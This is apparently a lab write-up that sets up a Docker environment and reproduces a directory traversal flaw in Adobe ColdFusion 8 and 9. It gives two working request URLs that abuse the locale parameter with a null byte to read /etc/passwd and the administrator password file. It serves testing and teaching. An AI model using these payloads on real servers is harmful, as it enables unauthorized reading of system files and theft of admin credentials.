Adobe ColdFusion is a dynamic Web server product of Adobe Corporation of the United States. Its running CFML (ColdFusion Markup Language) is a programming language for Web applications.

A directory traversal vulnerability exists in Adobe ColdFusion 8 and 9, which could allow unauthorized users to read arbitrary files on the server.

Environment construction

Run the following command to start the Adobe CouldFusion 8.0.1 server:

docker-compose up -d

It may take 1 to 5 minutes for the environment to start. After starting http://your-ip:8500/CFIDE/administrator/enter.cfm, you can visit the initialization page, enter the password admin, and start to initialize the entire environment.

Vulnerability to reproduce

Direct access http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en, you can read the file /etc/passwd:

Read the background administrator password http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en:

Read More:

• Docker: How to build a rabbitmq image cluster
• Opentelemetry + Jaeger Python Version Cross Service Call Example
• MAFIA: 1- OpenFlow statistics (Counters, Timestamps)(mafia-sdn/p4demos/demos/1-openflow/1.1-statistics/p4src/of.p4)
• MultipartFile Upload an Image Example
• Electron: How to Use BrowserWindow to Create a Window
• Windows Core Audio APIs: How to Progress Loopback Recording and Generate WAV File
• Websocket Front-end Call Example
• Android: How to Add Background Music for Activity with Service
• C#: How to Get details of the directory where the currently running program is located
• File class details (get the file name, size, path, create, etc.)
• Hutool Excel Import & Export Example
• Base64 Image Compression Example
• How to Use Printf in HAL Library
• Open CASCADE Technology 7.7.0 released
• Flutter & Dart Regular Expression Examples
• WCNSS_qcom_cfg.ini WIFI Configuration File Guide